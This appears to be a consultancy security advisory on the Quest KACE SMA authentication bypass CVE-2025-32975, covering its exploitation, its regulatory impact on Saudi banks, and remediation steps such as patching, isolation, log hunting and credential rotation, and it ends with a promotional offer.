CVE-2025-32975: Quest KACE SMA Auth Bypass Hits Saudi Bank Endpoint Management

CISA has added CVE-2025-32975 — a CVSS 10.0 pre-authentication bypass in Quest KACE Systems Management Appliance (SMA) — to its Known Exploited Vulnerabilities (KEV) catalog with a federal remediation deadline of May 4, 2026. For Saudi banks running KACE as their endpoint management plane, this is not a routine patch cycle. The bug grants administrative takeover without credentials, and from there an attacker inherits the appliance's authority to push software, run scripts, and inventory every managed Windows, macOS, and Linux endpoint in the bank.

Inside CVE-2025-32975: How the SSO Bypass Works

Discovered and disclosed by watchTowr Labs, CVE-2025-32975 is an authentication bypass in the way KACE SMA handles Single Sign-On request flows. The appliance trusts certain identity assertions in a way that lets an unauthenticated, network-reachable attacker impersonate any legitimate user — including the built-in administrator. Quest patched it in May 2025 across KACE SMA 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4). What changed in 2026 is exploitation: Arctic Wolf observed real-world abuse beginning the week of March 9, 2026, on internet-exposed instances, with attackers chaining the bypass into the KPluginRunProcess feature to run Base64-encoded payloads as the appliance.

Why Endpoint Management Appliances Are a Tier-Zero Target

Endpoint management platforms like KACE SMA, ManageEngine Endpoint Central, Microsoft Configuration Manager, and Tanium are effectively Tier-0 systems. They hold privileged service accounts, push signed scripts and MSI packages, and reach every laptop, ATM jump host, and back-office workstation in scope. An attacker who owns the appliance does not need to phish a single user — they can deploy ransomware, drop a Cobalt Strike beacon, or stage a fraudulent SWIFT operator workstation in one push. This is exactly the playbook Cl0p, Akira, and Black Basta operators have used against tooling like ConnectWise ScreenConnect, SimpleHelp, and Kaseya VSA over the last 18 months.

Impact on SAMA-Regulated Financial Institutions

KACE is widely deployed across the Saudi financial sector for software inventory, patch management, and endpoint compliance reporting — many of the same controls SAMA CSCC explicitly requires. An adversary owning the KACE appliance can simultaneously break SAMA Cyber Security Control Framework requirements 3.3.5 (Privileged Access Management), 3.3.13 (Patch Management), and 3.3.15 (Cyber Security Event Management), since the appliance is both the enforcement point and a logging source. Under PDPL Article 21, a confirmed compromise that exposes employee or customer endpoint data triggers a 72-hour notification obligation to SDAIA. NCA ECC controls 2-7-1 and 2-10-3 (vulnerability and event management) also come into play if the bank operates under joint regulatory scope. Third-party risk teams should also note: any managed services provider using KACE inside the bank's environment falls under SAMA's Cyber Security Framework Annex F third-party requirements.

Recommendations and Practical Steps

1. Confirm KACE SMA version against Quest KB 4379499. If you are below 13.0.385, 13.1.81, 13.2.183, 14.0.341 P5, or 14.1.101 P4 — patch this week, not next quarter.
2. Remove the KACE web interface from the public internet immediately. Front it with the corporate VPN, ZTNA gateway, or at minimum an IP-allowlisted firewall rule.
3. Hunt retroactively in KACE logs for unusual KPluginRunProcess invocations and Base64-encoded command payloads back to March 1, 2026 — Arctic Wolf has published indicators that map cleanly into Splunk and Microsoft Sentinel.
4. Rotate KACE service account passwords, KACE SSL certificates, and any agent enrollment tokens. Assume credentials cached on the appliance are burned.
5. Review every script, software distribution, and patch package pushed via KACE in the last 60 days for unauthorized payloads or modifications.
6. Map the finding into your SAMA CSCC compliance evidence: update the vulnerability register, file an internal incident ticket, and if exploitation is confirmed, notify SAMA via the established incident reporting channel within the regulator's required window.

Conclusion

CVE-2025-32975 is a textbook reminder that the management plane is the prize. Endpoint management appliances must be treated as Tier-0 assets — patched on shorter SLAs than user workstations, isolated from the public internet, monitored with the same intensity as domain controllers, and continuously reviewed under SAMA CSCC, NCA ECC, and PCI-DSS lenses.

Is your organization prepared? Contact Fyntralink for a complimentary SAMA Cyber Maturity Assessment covering your endpoint management, patch governance, and Tier-0 system exposure.